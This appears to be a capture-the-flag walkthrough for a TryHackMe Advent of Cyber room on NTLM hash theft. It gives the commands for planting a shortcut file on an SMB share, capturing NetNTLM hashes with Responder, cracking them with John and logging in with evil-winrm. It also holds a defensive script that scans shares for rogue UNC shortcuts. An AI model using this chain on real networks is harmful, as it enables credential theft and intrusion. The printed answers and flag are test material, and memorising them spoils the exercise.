2. What is the name of the AD authentication protocol that makes use of the NTLM hash?
NetNTLM
3. What is the name of the tool that can intercept these authentication challenges?
Responder
4. What is the password that McGreedy set for the Administrator account?
For this, go to the following directory:
cd /root/Rooms/AoC2023/Day23/ntlm_theft/
and then
cd stealthy
After this, run the following command to connect to the share with smbclient:
smbclient //10.10.69.51/ElfShare/ -U guest%
//10.10.69.51/ElfShare/ : This is the SMB share path you are connecting to.
-U guest% : This specifies the username as "guest" with an empty password (nothing follows the "%").
put stealthy.lnk
dir
Now, in another terminal, run the Responder command:
responder -I ens5
It took several minutes to connect. In the meantime, download the file mcgreedy.txt.
In the other tab you will see some responses. Copy the hash into hash.txt and run the following:
john --wordlist=greedykeys.txt hash.txt
This gives us the password, which is GreedyGrabber1@.
GreedyGrabbber1@
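From the defender's side, the upload step above can be hunted for by scanning a share for shortcut-style files that reference a remote UNC path. This is an added example, not part of the original walkthrough; the extension list, the allowed_hosts parameter and the sample bytes are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Assumption: file types Explorer parses for icons when a folder is browsed.
SUSPECT_EXT = {".lnk", ".url", ".scf"}

# \\host\share as ASCII bytes and as UTF-16LE (each character followed by 0x00).
ASCII_UNC = re.compile(rb"\\\\[A-Za-z0-9._-]{1,253}\\[A-Za-z0-9$._-]{1,80}")
UTF16_UNC = re.compile(
    rb"\\\x00\\\x00(?:[A-Za-z0-9._-]\x00){1,253}\\\x00(?:[A-Za-z0-9$._-]\x00){1,80}"
)

# Constructed sample: LNK-like header bytes followed by a UTF-16LE icon path.
SAMPLE_LNK = b"L\x00\x00\x00" + b"\x00" * 16 + r"\\192.0.2.10\icons\a.ico".encode("utf-16-le")


def unc_targets(data):
    """Return every \\\\host\\share reference embedded in the raw file bytes."""
    found = {m.group().decode("ascii") for m in ASCII_UNC.finditer(data)}
    found |= {m.group().decode("utf-16-le") for m in UTF16_UNC.finditer(data)}
    return found


def scan_share(root, allowed_hosts=frozenset()):
    """List (file, unc) pairs for shortcut files pointing at hosts not in allowed_hosts.

    allowed_hosts holds lowercase names of file servers you expect shortcuts to use.
    """
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SUSPECT_EXT:
            continue
        for unc in sorted(unc_targets(path.read_bytes())):
            host = unc[2:].split("\\", 1)[0].lower()
            if host not in allowed_hosts:
                findings.append((str(path), unc))
    return findings


if __name__ == "__main__":
    import sys
    for file, unc in scan_share(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{file}: references {unc}")
```

Run it against a mounted copy of the share and review any hit whose host is not one of your own file servers.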
5. What is the value of the flag that is placed on the Administrator’s desktop?
For this, we use evil-winrm to connect to the Windows machine and go to the Desktop directory.
There, run ls or dir to list the contents of the directory and find the flag.txt file.
THM{Greedy.Greedy.McNot.So.Great.Stealy}
Thanks for reading!!